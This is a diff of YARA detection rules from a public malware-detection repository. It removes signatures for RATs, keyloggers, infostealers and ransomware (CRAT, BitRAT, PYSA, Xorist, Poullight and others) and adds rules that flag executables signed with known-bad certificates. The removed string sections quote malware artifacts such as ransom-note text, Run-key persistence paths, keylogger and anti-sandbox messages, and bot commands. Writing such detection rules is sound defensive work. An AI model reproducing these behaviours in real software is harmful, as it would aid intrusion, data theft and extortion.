-		description = "Detects CRAT main DLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9757a8de-61ea-55c0-b64c-055798450985"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "311b4a7a-3185-5c61-961e-bd7d9bca28dd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1922-L1944"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5858-L5869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35"
+		logic_hash = "fdb28b4f8cf79d067ee8dcfc3109ceae38f7952c6fb34e61f489924d97d67151"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "cmd /c \"dir %s /s >> %s\"" wide
-		$s2 = "Set-Cookie:\\b*{.+?}\\n" wide
-		$s3 = "Location: {[0-9]+}" wide
-		$s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii
-		$s6 = "%serror.log" wide
-		$v2x_1 = "?timestamp=%u" wide
-		$v2x_2 = "config.txt" wide
-		$v2x_3 = "entdll.dll" wide
-		$v2x_4 = "\\cmd.exe" wide
-		$v2x_5 = "[MyDocuments]" wide
-		$v2x_6 = "@SetWindowTextW FindFileExA" wide
-		$v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide
-		$v2s_1 = "Installed Anti Virus Programs" ascii
-		$v2s_2 = "Running Processes" ascii
-		$v2s_3 = "id=%u&content=" ascii
+		thumbprint = "2d1fd0cce4aa7e7dc6dd114a301825a7b8e887cf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $v2x* ) or all of ( $v2s* ) or ( 2 of ( $v2s* ) and 4 of ( $v2x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONFUSER" and pe.signatures [ i ] . serial == "be:b7:21:fc:b3:27:4c:98:44:79:d6:55:4e:fe:8f:49" )
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C4188D6B70B4Bd3B977B19Abd04C1157 : FILE
 {
 	meta:
-		description = "Detects CRAT keylogger plugin DLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a8682786-7704-56f0-a6df-b4e2ab4d7536"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f5b2b4cf-39a5-59c6-860e-b738a2acfd89"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1946-L1962"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5871-L5882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189"
+		logic_hash = "6ed619e18d749c2524ad3c1ddc3268f9ddf77feb3a3f2c5954ae4e7124d63c75"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.CRAT"
-
-	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "Create KeyLogMutex %s failure %d" wide
-		$s2 = "Key Log Mutex already created! %s" wide
-		$s3 = /KeyLogThread\s(started|finished|terminated)!/ wide
-		$s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		thumbprint = "90fefd18c677d6e5ac6db969a7247e3eb0b018df"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRESTO Co., s.r.o." and pe.signatures [ i ] . serial == "00:c4:18:8d:6b:70:b4:bd:3b:97:7b:19:ab:d0:4c:11:57" )
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ad255D4Ebefa751F3782587396C08629 : FILE
 {
 	meta:
-		description = "Detects CRAT Clipboad Monitor plugin DLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "58e77872-5bd0-53b1-9595-c961c45e138c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1964-L1979"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5884-L5895"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1"
+		logic_hash = "cc51de3852257b12a780f80755c7ca21f5d82542649c65072fd9427271da12ef"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "Clipboard Monitor Mutex [%s] already created!" wide
-		$s2 = "ClipboardMonitorThread started!" fullword wide
-		$s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide
-		$s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		thumbprint = "8fa4298057066c9ef96c28b2dd065e8896327658"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" )
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_084B6F19898214A02A5F32E6Ea69F0Fd : FILE
 {
 	meta:
-		description = "Detects CRAT Screen Capture plugin DLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "37149424-6ce7-56db-98c5-3895bf3f5c9b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1981-L2000"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5897-L5908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42"
+		logic_hash = "844339ec8aaf93e279b294830a842f007d97adc4be4f6910d143ee16e5710ed5"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "User is inactive!, give up capture" wide
-		$s2 = "Capturing screen..." wide
-		$s3 = "%s\\P%02d%lu.tmp" fullword wide
-		$s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide
-		$s5 = "ScreenCaptureMutex already created! %s" fullword wide
-		$s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide
-		$s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide
-		$s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		thumbprint = "4b89f40ba2c83c3e65d2be59abb3385cde401581"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TORG-ALYANS, LLC" and pe.signatures [ i ] . serial == "08:4b:6f:19:89:82:14:a0:2a:5f:32:e6:ea:69:f0:fd" )
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_24C1Ef800F275Ab2780280C595De3464 : FILE
 {
 	meta:
-		description = "Detects CRAT Hansom Ransomware plugin DLL"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0bfc97df-545f-5453-afe0-5777dc1c95b4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0bd14ac3-9761-5ac4-8cdc-6212a92c5b5d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2002-L2020"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5910-L5921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077"
+		logic_hash = "773fdb6d15a5bd1282dd9a48601b453b62de2e9832822858ad750c6462d6e116"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$cmd1 = "/f /im \"%s\"" wide
-		$cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide
-		$cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide
-		$cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide
-		$s1 = "\\hansom.jpg" wide
-		$s2 = "HansomMain" fullword ascii wide
-		$s3 = "ExtractHansom" fullword ascii wide
-		$s4 = "Hansom2008" fullword ascii
-		$s5 = ".hansomkey" fullword wide
-		$s6 = ".hansom" fullword wide
-		$s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		thumbprint = "836b81154eb924fe741f50a21db258da9b264b85"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $cmd* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $cmd* ) ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLGAN LIMITED" and pe.signatures [ i ] . serial == "24:c1:ef:80:0f:27:5a:b2:78:02:80:c5:95:de:34:64" )
 }
-rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6401831B46588B9D872B02076C3A7B00 : FILE
 {
 	meta:
-		description = "Detects AlienCrypter injector/downloader/obfuscator"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d651bbe4-7e50-51bc-8f96-a78b11846699"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2022-L2036"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5923-L5934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547"
+		logic_hash = "9a90c9d51dd6eb37bb3b6b17c5e3e5ebb6b6922efa14e3d8d60e72bcdb7b7259"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ".AlienRunPE." ascii wide
-		$s2 = "RunAsNewUser_RunDLL" fullword wide
-		$s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 }
-		$s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 }
-		$s5 = "@@@http" wide
-		$resp1 = "</p><p>@@@77,90," ascii wide
-		$resp2 = "</p><p>@@@HH,JA," ascii wide
+		thumbprint = "19fc95ac815865e8b57c80ed21a22e2c0fecc1ff"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 3 of them ) or ( 1 of ( $resp* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIV GROUP ApS" and pe.signatures [ i ] . serial == "64:01:83:1b:46:58:8b:9d:87:2b:02:07:6c:3a:7b:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Ficker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : FILE
 {
 	meta:
-		description = "Detects Ficker infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f3cb7bd9-9e28-5478-b65d-60915157dd3b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2038-L2055"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5936-L5947"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452"
+		logic_hash = "2902b075f40f1413eee937c045e082a3141ec309f9d8e1dfd3a384050ea0776c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Ficker"
-
-	strings:
-		$s1 = "JNOde\\" ascii
-		$s2 = "\"SomeNone" fullword ascii
-		$s3 = "kindmessage" fullword ascii
-		$s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii
-		$s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii
-		$s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii
-		$s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii
-		$s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii
-		$s9 = "_matherr(): %s in %s(%g, %g)  (retval=%g)" ascii
+		thumbprint = "e33dc0787099d92a712894cfef2aaba3f0d65359"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" )
 }
-rule DITEKSHEN_MALWARE_Win_Xorist : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ed801843Fa001B8Add52D3A97B25931 : FILE
 {
 	meta:
-		description = "Detects Xorist ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "76119441-343d-51c3-90eb-9d54c80a983d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8dc9fbde-57bb-56ca-b925-902059612606"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2057-L2078"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5949-L5960"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa"
+		logic_hash = "2607dde1318b9b84056fc73664e4c1f82f20c23f311216e2201c3fdee0d1b6db"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Xorist"
-
-	strings:
-		$x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00
-                53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45
-                00 52 00 }
-		$x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35
-                37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21
-                00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d
-                70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 }
-		$s1 = "\\shell\\open\\command" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii
-		$s3 = "CRYPTED!" fullword ascii
-		$s4 = "Attention!" fullword ascii
-		$s5 = "Password:" fullword ascii
-		$s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c }
+		thumbprint = "4ee1539c1455f0070d8d04820fb814f8794f84df"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AM El-Teknik ApS" and pe.signatures [ i ] . serial == "7e:d8:01:84:3f:a0:01:b8:ad:d5:2d:3a:97:b2:59:31" )
 }
-rule DITEKSHEN_MALWARE_Win_PYSA : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0F0Ed5318848703405D40F7C62D0F39A : FILE
 {
 	meta:
-		description = "Detects PYSA/Mespinoza ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3a3fad6a-46bc-51dc-9723-4412034ca442"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6baebaa7-275c-571d-b321-9a21d7799a33"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2080-L2100"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5962-L5973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4"
+		logic_hash = "77bd8fd2dc48e2fc8abbf0f3411dfa8010326b6a9928fb392cce6e0fe8e9d309"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.PYSA"
-
-	strings:
-		$s1 = "%s\\Readme.README" fullword wide
-		$s2 = "Every byte on any types of your devices was encrypted" ascii
-		$s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) }
-		$s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) }
-		$s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53
-                4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f
-                66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72
-                65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69
-                63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 }
-		$f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii
-		$f2 = ".?AV?$TF_EncryptorImpl@" ascii
-		$f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii
+		thumbprint = "ed91194ee135b24d5df160965d8036587d6c8c35"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $f* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIES UPRAVLENIE PROTSESSAMI, OOO" and pe.signatures [ i ] . serial == "0f:0e:d5:31:88:48:70:34:05:d4:0f:7c:62:d0:f3:9a" )
 }
-rule DITEKSHEN_MALWARE_Win_Polar : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_537Aa4F1Bae48F052C3E57C3E2E1Ee61 : FILE
 {
 	meta:
-		description = "Detects Polar ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "33316c5e-b14f-50b5-8971-3a8b5a3c2497"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2102-L2123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5975-L5986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c"
+		logic_hash = "83d205998f43a2404146064e13726c149bc56fed6b886ee1812378c027f03da0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Polar"
-
-	strings:
-		$s1 = "Encrypt Failed ! ErrorMessage :" wide
-		$s2 = ".locked" fullword wide
-		$s3 = ".cryptd" fullword wide
-		$s4 = "$SysReset" fullword wide
-		$s5 = "Polar.Properties.Resources" ascii wide
-		$s6 = "AES_EnDecryptor.Basement" fullword ascii
-		$s7 = "RunCMDCommand" fullword ascii
-		$s8 = "killerps_list" fullword ascii
-		$s9 = "clearlog" fullword ascii
-		$s10 = "encryptFile" fullword ascii
-		$s11 = "changeBackPictrue" fullword ascii
-		$pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii
-		$pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii
+		thumbprint = "15355505a242c44d6c36abab6267cc99219a931c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 1 of ( $pdb* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALPHA AME LIMITED LLP" and pe.signatures [ i ] . serial == "53:7a:a4:f1:ba:e4:8f:05:2c:3e:57:c3:e2:e1:ee:61" )
 }
-rule DITEKSHEN_MALWARE_Win_Bitrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_61B11Ef9726Ab2E78132E01Bd791B336 : FILE
 {
 	meta:
-		description = "Detects BitRAT RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9041a21f-0f27-5e90-8429-863e361381bf"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5b830ab1-16d2-573c-81b7-b8b922af6f4b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2125-L2153"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5988-L5999"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb"
+		logic_hash = "50c89d732409ff680734f481d858256001245c10345d9e6f1cbb51dcdc9c2cc9"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BitRAT"
-
-	strings:
-		$s1 = "\\plg\\" fullword ascii
-		$s2 = "klgoff_del" fullword ascii
-		$s3 = "files_delete" ascii
-		$s4 = "files_zip_start" fullword ascii
-		$s5 = "files_exec" fullword ascii
-		$s6 = "drives_get" fullword ascii
-		$s7 = "srv_list" fullword ascii
-		$s8 = "con_list" fullword ascii
-		$s9 = "ddos_stop" fullword ascii
-		$s10 = "socks5_srv_start" fullword ascii
-		$s11 = "/getUpdates?offset=" fullword ascii
-		$s12 = "Action: /dlex" fullword ascii
-		$s13 = "Action: /clsbrw" fullword ascii
-		$s14 = "Action: /usb" fullword ascii
-		$s15 = "/klg" fullword ascii
-		$s16 = "klg|" fullword ascii
-		$s17 = "Slowloris" fullword ascii
-		$s18 = "Bot ID:" ascii
-		$t1 = "<sz>N/A</sz>" fullword ascii
-		$t2 = "<silent>N/A</silent>" fullword ascii
+		thumbprint = "9f7fcfd7e70dd7cd723ac20e5e7cb7aad1ba976b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 4 of ( $s* ) and 1 of ( $t* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" )
 }
-rule DITEKSHEN_MALWARE_Win_Poullight : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E339C8069126Aa6313484Fea85B4B326F7B8860C : FILE
 {
 	meta:
-		description = "Detects Poullight infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a8a6a285-98e1-5a2a-ab89-c67809fea3b2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2155-L2176"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6001-L6012"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd"
+		logic_hash = "6f373c5a8f99893088fa1afffeccdf24ae6ed118d7bea9df43281073bd8e85bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920074-920075"
-		snort3_sid = "920074-920075"
-		clamav_sig = "MALWARE.Win.Trojan.Poullight"
-
-	strings:
-		$s1 = "zipx" fullword wide
-		$s2 = "{0}Windows Defender.exe" fullword wide
-		$s3 = "pll_test" fullword wide
-		$s4 = "loginusers.vdf" wide
-		$s5 = "Stealer by Nixscare" wide
-		$s6 = "path_lad" fullword ascii
-		$s7 = "<CheckVM>" ascii
-		$s8 = "Poullight.Properties" ascii
-		$s9 = "</ulfile>" fullword wide
